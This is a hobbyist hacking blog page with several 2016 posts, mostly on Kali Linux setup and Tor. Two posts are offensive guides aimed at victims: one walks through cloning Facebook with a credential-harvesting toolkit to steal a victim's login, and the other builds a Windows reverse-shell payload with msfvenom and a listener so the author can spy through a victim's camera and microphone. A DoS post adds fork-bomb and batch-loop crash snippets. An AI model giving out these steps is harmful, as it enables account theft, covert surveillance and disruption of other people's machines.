We are legion, for we are many.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, October 12, 2016

Hack any facebook account.

9:27:00 AM Posted by Unknown , , No comments
Hey ya people!! How you doin today!

Today will be something special. Today I'll be teaching you guys how to hack facebook of someone on your network. We can't call ourselves hackers if we can't hack facebook. Hacking facebook is the threshold of being a novice hacker.

Now you don't wanna be searching google for facebook hacking apps that hack facebook in minutes or the first search result that involves downloading apps. 

In this blog post I'll be teaching you how to hack by phishing. Now this method only works for computers on your network. I will be doing a article on how to hack facebook outside of the LAN, soon. 

But for now lets focus on the things at hand, you'll need kali linux for this to work. You can read my article on how to download kali linux here :- https://weareanonymousa.blogspot.com/2016/07/how-to-download-kali-linux.html

So now let's get to it.

1. Open up terminal and type "setoolkit".
2. Now if it says press enter or something press enter.
3. Now it'll give you a list/menu to choose how you wish to use this kit.
4. Choose Social-Engineering Attacks. You don't enter the name you just enter 1 and press enter.
5. Now press 2 i.e for Website attack vectors.
6. Press 3 for Credential harvester attack method.
7. Now enter 2 for Site cloner.
Now the pattern is 1 [enter] 2 [enter] 3[enter] 
2 [enter].
It will now ask for "IP address for the POST back in Harvester/Tabnabbing:" There you enter your machines ip address. You can find it out by typing ifconfig in terminal.
Now it'll ask which site to clone. You type in "www.facebook.com"
It's all done. To find where your files are, go to Computer>var>www>html. And you will find your files there. There will only be 1 text file
The text file will give you all the info after the victim has filled out all the information.

Now send the victim the cloned site. It's just the ip you put above. 
So now the victim gets the ip. He/she opens it. Logs into her/his account and we get the info required.
To get the required information Just go to the text file in the html folder. And voila you have the victims credentials. 
Now I'll be doing a follow up post to this article on How to hack facebook outside the LAN. So, yeah I hope you enjoyed todays post. Please keep on visiting weareanonymousa.blogspot.com . And I'll see you in the next one.


 
See ya!


 

Monday, October 10, 2016

What is DDOS?

8:36:00 AM Posted by Unknown , , No comments

Hey you guys?! Whats up !! Today I'll be discussing a new term. Its called DDos and its a very common type of attack that hackers use while hacking into a system or while a hacker tries to bring down the system. Many TV series bring up the topic DDos. Its one of the most basic term that every computer enthusiast must know. A denial-of-service (Dos) attack is an attempt to make a machine or network resource available to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fullfilled.
A distributed denial-of-service (DDos) is where the attack source is more than one, often thousands of, unique IP addresses. It is analogous to a group of people crowding the entry door or gate to a shop or business, and not letting legitimate parties enter into the shop or business, disrupting normal operations. The scale of DDos attacks has continued to rise over recent years, even reaching over 600Gbit/s.

An example of Dos is:
:(){:|:&};: //If you type this in terminal of a linux machine, the OS will crash.
                                               OR
:1
start 
goto 1

If you type this in notepad and save it as a .bat file and run it, your OS will not be able to respond, it'll crash
Let me explain DDos in a nutshell. Assume you are in a restaurant that is not that big. So if you call the waiter he'll take your order and give it to the chef right? Now assume there is only one waiter and there are 100 of people giving him their order. The waiter can't possibly complete all your requests and will ask for a time out. Well thats the basic of DDos. In this scenario you're the client and the waiter is the server. Put the logic in the above context and you'll understand what DDos is. There are many types of Dos attacks but I can't discuss all of them since I don't know all of them. But the basic is the same most of them.

Well thats all for today's article. Hope you got a lot of info on the topic Dos. See you next time.

Please do comment on what topics I should discuss on down in the comments section below.

Saturday, October 8, 2016

How to add a new user in Kali linux.

7:58:00 PM Posted by Unknown No comments
Hey what is up you guys!? Today I'll be teaching you how to to create a new user in kali linux. I don't I need to tell you why you need to create a new user except for root. It is mainly to run applications that won't run in the root account.
So let's get started.


  1. Open up terminal and type:- useradd -m yourusername and press enter.    [In username type your username for the guest account]
  2.  Now to add a password type:- passwd yourusername and press enter.
  3. Now to add the sudo privilege to the account type :- usermod -a -G sudo yourusername and press enter. Here -a will add and -G will give the group this account to add to their directories. 
  4. Now to change the default shell to bash type :- chsh -s /bin/bash yourusername and press enter.
And that's it. You've successfully created a new user in kali linux.
Thank you guys for visiting my blog and I'll see you in the next one.

Best app to hide your ass while surfing the internet.

11:48:00 AM Posted by Unknown , , , , No comments
Hey you guys Its me hardy, back with another post on how to install tor in a kali machine. I've been using kali for about a week or so and I'm totally falling in love with it. The only thing that kali is famous among layman is for it remarkable application list but it is missing the tor browser from its list. But don't you worry I'll be teaching you how to install and use tor. For those of you who don't know what tor is let me explain it in a nutshell. Tor is a internet browser used to surf the net without being traced back. Its like walking without leaving a trail. Now lets get to it shall we.

Step 1: 
First You'll have to install tor.
For this, open terminal and type apt-get install tor .
Step 2:
Download tor at their official
site https://www.torproject.org/projects/torbrowser.html.en [I prefer the 64-bit version]
Now to setup the bundle open up another terminal and type
cd ~/Downloads/           {Instead of Downloads type in where your tor is downloaded.}
tar -xvJf tor-browser-*
cd tor-browser*
./start-tor-browser.desktop

That's it!! You've successfully downloaded tor browser in your kali machine! Now you can watch as much huh-huh as you want without being watched by anyone.
There is one more thing you want to know. If you are downloading using root you'll be greeted by an error like sudo or root something. To avoid this, install tor in a guest account in your kali machine and you are good to go. Please let me know down in the comments below if you are having a problem.  See you later people.    

Sunday, October 2, 2016

How to Dual boot kali linux on a windows platform.

8:15:00 AM Posted by Unknown No comments
Hello Guys!! Today I'll be teaching you how to dual boot Kali linux on a windows machine.
There are three main things you need to have before performing this task.
  • A bootable usb with kali linux in it(You have to burn it to the usb).
  • A separate system partition for kali.
You can Download kali linux here.
After downloading kali, burn it to a usb drive by using rufus.
Now create a system partition by following the process:

  1. On your windows machine go to disk manager.
  2. There you will see your primary storage drives. Now select the storage from which you want to get the required memory. I would recommend using the drive with maximum storage capacity.
  3. Right click on the drive, you will see an option called shrink volume.
     
  4. Now select shrink volume and after that you can customize your new volume according to your will. But select a space of about 50 gb.
  5. Now this new volume will be Unallocated. Right click on the volume and a menu will appear "New Simple Volume". Click on it. This will give it a separate distinction on its volume.
  6. Now you are ready to install Kali linux.
  7. Power down your computer then insert your USB drive. Make sure you have enabled boot by USB in the BIOS settings. 
  8. After that you will be taken to the installation process. You can now easily install kali.
After the installation is finished you can remove your USB drive and run kali. If you wish to use windows then simply shutdown kali and you will be taken to windows system.

Thank you guys for reading this article on HOW TO INSTALL KALI LINUX
Keep on visiting weareanonymousa Stay blessed.

Monday, July 11, 2016

How to Download Kali linux.

5:44:00 PM Posted by Unknown No comments
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as  Penetration Testing, Forensics and Reverse Engineering.
Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of BackTrack Linux, adhering completely to Debian development standards.
You can download kali at :
https://www.kali.org/downloads/

Download the iso file for virtual box you can choose between the 64-bit or the 32-bit one.
You can download it very easy so enjoy and see you later bye.

Sunday, July 10, 2016

How to make a malware.

7:39:00 AM Posted by Unknown No comments
HEYYYYYY GUYSSSSS!!!! WHAT IS UPPPPP!!!!!?????? Today I'm in a very good mood because...because, ohhh I don't know.
So lets get to it today I'll be teaching you how to make a malware using metasploit.
Metasploit actually is a software that is used to make and exploit codes against a remote machine.  We'll be using this to make a malware program that can be used to look through the victims camera and record through his recorder without him knowing it. It can be used in many other ways. But today we'll be sticking to malware creation.
Okay first thing you'll be needing is kali linux for this hack.
before you start, open terminal in kali linux and type in ifconfig then copy your ip address
So let's get down to it:


  1. Open up terminal and type in "msfpayload or msfvenom windows/meterpreter/reverse_tcp LHOST=paste your ip address here LPORT=4444 X>/root/filename.exe"
  2. To verify the exe file go to home and you'll see your file there
  3. Now to set up the listener.
  4. Open up another terminal and type "msfconsole".
  5. Type "use exploit/multi/handler".
  6. "set LHOST your ip address here".
  7. "set LHOST 4444"
  8. "set PAYLOAD windows/meterpreter/reverse_tcp"
  9. "exploit".
And thats it, now all you have to do is to send the file to the victims computer an have them open it. After they do you'll see some codes appear on the screen to look at what you can do now type in help and look at the options available.
That is all for Todays Tutorial. Thank you for visiting and please dont forget to share this blog with your friends and on social media, I'd really like it if you'd all help me in increasing the traffic of this blog because it would be much more fun if more people saw my content. If the traffic of this blog keeps on increasing I'll be uploading some kickass posts so thank you once again and bye bye!!